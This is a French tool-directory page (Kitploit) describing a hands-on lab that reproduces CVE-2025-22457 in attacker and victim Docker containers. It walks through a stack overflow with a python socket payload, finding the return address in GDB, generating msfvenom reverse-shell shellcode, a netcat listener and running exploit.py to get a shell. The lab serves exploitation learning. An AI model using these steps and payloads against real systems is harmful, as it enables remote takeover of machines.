Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-22457-vulnserver-lab — Labo pratique reproduisant CVE-2025-22457 : met en place des conteneurs Docker attaquant/victime, trouve les adresses de pile avec GDB et délivre un exploit de reverse shell msfvenom. | Kitploit
Outils/GitHubGitHub/donofly/cve-2025-22457-vulnserver-lab
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeCTFTests d'IntrusionApprentissage et ÉducationExploitation de BinairesLabs et Pratique
GitHubdonofly/cve-2025-22457-vulnserver-lab

CVE-2025-22457-vulnserver-lab

Labo pratique reproduisant CVE-2025-22457 : met en place des conteneurs Docker attaquant/victime, trouve les adresses de pile avec GDB et délivre un exploit de reverse shell msfvenom.

Voir le dépôt
1il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

step 1 configuration de l'environnement

Permissions & script d'exécution

Si vous utilisez Windows, vous pouvez ouvrir wsl pour l'exécuter

root@kitploit:~
chmod +x setup_environment.sh
./setup_environment.sh

step 2 : Recherche des valeurs dynamiques (étapes manuelles requises)

Comme les adresses mémoire et les IP sont dynamiques selon l'environnement, il faut les trouver manuellement et mettre à jour le script exploit.py.

2.0 Commencez par ouvrir deux conteneurs Docker attacker et un conteneur Docker victim en préparation pour la suite

root@kitploit:~
docker exec -it atac /bin/bash
docker exec -it vic /bin/bash

2.1 Recherche de stack_address (adresse de retour)

L'objectif de cette étape est de trouver une adresse de pile stable afin que notre payload puisse sauter précisément.

1. Démarrer GDB dans le conteneur victim
root@kitploit:~
gdb ./vulnserver
2. Définir un point d'arrêt après la fonction strcpy
root@kitploit:~
(gdb) b strcpy
3. Lancer le programme, vulnserver commence à écouter
root@kitploit:~
(gdb) run

Déclencher le point d'arrêt : utilisez le conteneur Docker attacker et exécutez la commande suivante pour envoyer un payload de test. Cela fera s'arrêter GDB sur le point d'arrêt. Remarque : remplacez <VICTIM_IP> par l'IP de la Victim affichée à l'étape 1.

root@kitploit:~
python3 -c 'import socket; s = socket.socket(); s.connect(("<VICTIM_IP>", 9999)); s.send(b"A"*516 + b"BBBB" + b"C"*300); s.close()'

Trouver et noter l'adresse : revenez au terminal où se trouve GDB, le programme devrait être arrêté. Exécutez la commande suivante pour examiner la pile :

root@kitploit:~
(gdb) x/200wx $esp

Dans la sortie, trouvez une zone composée de 0x43434343 (représentant 'C'). Choisissez une adresse au hasard au milieu de cette zone (par exemple 0xffffd580) et copiez-la. C'est la stack_address.

2.2 Mettre à jour exploit.py et générer buf (Shellcode)

Mettre à jour stack_address :

À l'aide d'un éditeur de texte, remplacez la stack_address dans exploit.py par l'adresse que vous venez de copier.

Générer et mettre à jour buf (Shellcode) :

Dans le shell du conteneur attacker, exécutez la commande msfvenom pour générer le shellcode. Remarque : remplacez <ATTACKER_IP> par l'IP de l'Attacker affichée à l'étape 1.

root@kitploit:~
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -b '\x00' -f python

Copiez l'intégralité du bloc buf = b""... produit par msfvenom et utilisez-le pour remplacer entièrement la partie variable buf existante dans le fichier exploit.py.

step 3 : Exécuter l'attaque

Démarrer l'écouteur : dans la fenêtre shell de l'un des conteneurs attacker, exécutez la commande suivante pour démarrer l'écouteur netcat.

root@kitploit:~
nc -lvnp 4444

Ouvrir la connexion côté victim :

Vous pouvez utiliser l'une des deux méthodes suivantes Méthode 1

root@kitploit:~
./vulnserver

Méthode 2

root@kitploit:~
gdb ./vulnserver
gef➤  run

Exécuter le script d'attaque : exécutez le exploit.py mis à jour dans le conteneur Docker attacker. (Remarque : remplacez <victim_ip> par l'IP de la victim affichée à l'étape 1)

root@kitploit:~
python3 exploit.py <victim_ip>

Vérifier le résultat : revenez à la fenêtre où se trouve l'écouteur netcat. Si tout se passe bien, vous verrez une connexion s'établir et obtiendrez un shell interactif. Vous pouvez saisir des commandes comme whoami, ls -la pour vérifier.

step 4 : Nettoyer l'environnement

Quitter GDB et les conteneurs :

Saisissez quit dans GDB, puis exit dans le shell du conteneur.

Vous pouvez exécuter les commandes suivantes pour arrêter et nettoyer tous les conteneurs et réseaux.

root@kitploit:~
docker stop vic atac
docker network rm 111550082_net
Télécharger l’outil